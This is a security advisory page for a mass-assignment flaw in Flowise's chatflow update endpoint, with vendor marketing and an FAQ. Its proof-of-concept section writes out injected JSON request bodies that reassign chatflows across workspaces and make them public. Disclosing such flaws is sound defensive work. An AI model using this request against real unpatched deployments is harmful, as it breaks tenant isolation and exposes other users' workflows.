CVE-2026-42863

CVE-2026-42863 is a high-severity security vulnerability in flowise (npm), affecting versions <= 3.1.1. It is fixed in 3.1.2.

Summary

A Mass Assignment vulnerability exists in the chatflow update endpoint of FlowiseAI.

The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object.

Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings.

Details

The endpoint responsible for updating chatflows:

PUT /api/v1/chatflows/{chatflowId}

accepts a JSON request body containing the chatflow configuration (flowData) along with other metadata fields.

However, the server does not restrict which properties may be modified by the client. As a result, user-controlled request bodies can include additional fields that should normally be controlled only by the backend.

Examples of server-controlled fields that can be manipulated include:

  1. deployed
  2. isPublic
  3. workspaceId
  4. createdDate
  5. updatedDate
  6. category
  7. type

These fields appear to be directly mapped to the underlying database entity when processing the update request, suggesting that the server performs a direct merge of the request body into the chatflow model without applying a strict DTO whitelist or authorization checks.

For example, modifying the request body with:

{
  "deployed": true,
  "isPublic": true,
  "createdDate": "1999-03-06T10:59:32.000Z",
  "updatedDate": "1999-03-06T13:21:34.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

results in the server accepting and persisting these values.

In testing, a second workspace was created in the database and the workspaceId field was successfully modified through the API request. The chatflow was reassigned to the attacker-controlled workspace, confirming that the application does not enforce workspace ownership validation.

PoC

Authenticate to the Flowise interface.

Capture the request used to update a chatflow:

PUT /api/v1/chatflows/<CHATFLOW_ID>
Content-Type: application/json

Modify the request body by injecting additional fields:

{
  "name": "test-flow",
  "flowData": "{...}",
  "deployed": true,
  "isPublic": true,
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Send the request.

Observe that the response returns the manipulated values:

{
  "deployed": true,
  "isPublic": true,
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Verify in the database that the chatflow has been reassigned:

SELECT id, workspaceId FROM chat_flow WHERE id='<CHATFLOW_ID>';

The workspaceId value reflects the attacker-supplied workspace.

Impact

This vulnerability allows authenticated users to manipulate server-controlled attributes of chatflows.

Confirmed impacts include:

  • Unauthorized modification of chatflow visibility (isPublic)
  • Unauthorized deployment state changes (deployed)
  • Cross-workspace reassignment of chatflows (workspaceId)
  • Unauthorized modification of metadata (createdDate, updatedDate)

In multi-tenant environments, this allows an attacker to move chatflows between workspaces without authorization, breaking tenant isolation boundaries.

This may enable:

  • Cross-workspace workflow takeover
  • Unauthorized exposure of private workflows
  • Manipulation of deployed agent workflows

The issue stems from missing authorization checks and improper handling of client-controlled input in the chatflow update endpoint.

Affected versions

flowise (<= 3.1.1)

Security releases

flowise → 3.1.2 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade flowise to 3.1.2 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-42863? CVE-2026-42863 is a high-severity security vulnerability in flowise (npm), affecting versions <= 3.1.1. It is fixed in 3.1.2.
  2. Which versions of flowise are affected by CVE-2026-42863? flowise (npm) versions <= 3.1.1 is affected.
  3. Is there a fix for CVE-2026-42863? Yes. CVE-2026-42863 is fixed in 3.1.2. Upgrade to this version or later.
  4. Is CVE-2026-42863 exploitable, and should I be worried? Whether CVE-2026-42863 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-42863 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-42863? Upgrade flowise to 3.1.2 or later.

Other vulnerabilities in flowise

CVE-2026-56268CVE-2026-46480CVE-2026-46479CVE-2026-46478CVE-2026-46477

Stop the waste.
Protect your environment with Kodem.